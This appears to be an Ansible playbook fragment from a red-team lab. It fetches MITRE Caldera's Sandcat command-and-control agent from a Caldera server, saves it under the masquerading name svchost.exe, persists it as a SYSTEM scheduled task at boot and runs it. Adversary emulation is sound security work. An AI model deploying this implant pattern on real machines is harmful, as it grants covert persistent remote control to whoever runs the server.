- name: Stop old Sandcat agent by path
  win_shell: |
    $p = Get-CimInstance Win32_Process | Where-Object {
      $_.ExecutablePath -eq 'C:\ProgramData\svchost.exe'
    }
    if ($p) { Stop-Process -Id $p.ProcessId -Force }
  ignore_errors: yes

- name: Download Sandcat agent (Windows)
  win_get_url:
    url: "{{ caldera_server }}/file/download"
    dest: C:\ProgramData\svchost.exe
    headers:
      KEY: "{{ caldera_api_key_red }}"  
      file: sandcat.go
      platform: windows
    timeout: 30

- name: Run Sandcat agent as Scheduled Task
  community.windows.win_scheduled_task:
    name: "SandcatAgent"
    description: "Caldera Sandcat Agent"
    actions:
      - path: 'C:\ProgramData\svchost.exe'
        arguments: '-server {{ caldera_server }} -group {{ caldera_group }}'
    triggers:
      - type: boot 
    username: SYSTEM
    state: present
    enabled: yes

- name: Start Sandcat agent task now
  win_shell: schtasks /run /tn "SandcatAgent"